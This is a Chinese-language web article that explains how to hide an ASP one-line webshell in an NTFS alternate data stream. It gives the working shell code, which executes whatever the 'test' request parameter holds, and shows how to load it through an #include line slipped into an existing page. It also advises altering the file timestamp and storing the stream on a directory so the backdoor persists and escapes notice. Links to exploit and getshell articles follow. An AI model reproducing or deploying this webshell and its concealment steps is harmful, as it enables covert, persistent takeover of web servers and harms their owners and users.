利用ntfs流隐藏你的一句话木马的方法

所属分类: 网络安全 / 脚本攻防 阅读数: 1325
收藏 0 赞 0 分享

这是利用NTFS流隐藏你的一句话小马,这方法,文件写入后,不容易给发现,隐藏性好!

如下是ASP脚本的例子!
NTFS流文件的内容如下

<%
re= request("test")
if re <>"" then
  execute re
  response.end '表示结束,不再处理别的代码
end if
%>


把内容写入如下位置(示例位置)
H:\Web\动易\Inc:1.jpg

看清楚,是 :1.jpg 不是 \1.jpg
文件写入后,H:\Web\动易\Inc 目录里是看不到文件的!

现在要引导这个一句话文件!格式: <!--#include file="目录:1.jpg"-->

我随便选一个文件(最好不要自己新建文件,别人容易发现有新文件)
H:\Web\动易\Announce.asp


添加 
<!--#include file="inc:1.jpg"-->

修改后保存!
一句话木马隐藏基本完成!当然 H:\Web\动易\Announce.asp 你可以改个一下修改的时间,
这样别人就不容易发现有问题!

还有说一下,2003的流,是可以写入文件也可以写入目录的!你想把一句话马写在目录里也成,文件里也成
但建议保存到目录里,因为文件如果修改,流数据将会清空,但目录不会!

用菜刀测试成功!

更多精彩内容其他人还在看

PHP的一个EVAL的利用防范

这篇文章主要为大家介绍下php eval的利用防范,为了安装强烈兼用少用eval函数
收藏 0 赞 0 分享

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日

近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,大家早点去官方下载补丁2014年2月28日
收藏 0 赞 0 分享

一些常见的PHP后门原理分析

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果
收藏 0 赞 0 分享

Mysql语法绕过360scan insert防注入方法

其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =方法
收藏 0 赞 0 分享

科讯KESION CMS最新版任意文件上传WEBSHELL漏洞

会员上传文件漏洞,可以上传任意后缀,实现任意文件上传WEBSHELL
收藏 0 赞 0 分享

phpcms2008 代码执行 批量getshell EXP(使用菜刀)

这篇文章主要介绍了phpcms2008 代码执行 批量getshell EXP的相关资料,需要的朋友可以参考下
收藏 0 赞 0 分享

PHP多字节编码漏洞小结

这篇文章主要介绍了PHP多字节编码漏洞小结,需要的朋友可以参考下
收藏 0 赞 0 分享

防范 dedecms 广告内容插入后门

这篇文章主要介绍了防范 dedecms 广告内容插入后门,需要的朋友可以参考下
收藏 0 赞 0 分享

记一次发现利用preg_replace隐藏后门和后续探究

php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码
收藏 0 赞 0 分享

Linux系统采用netstat命令查看DDOS攻击的方法

这篇文章主要为大家介绍了Linux系统采用netstat命令查看DDOS攻击的方法,对于网络安全而言非常重要!需要的朋友可以参考下
收藏 0 赞 0 分享
查看更多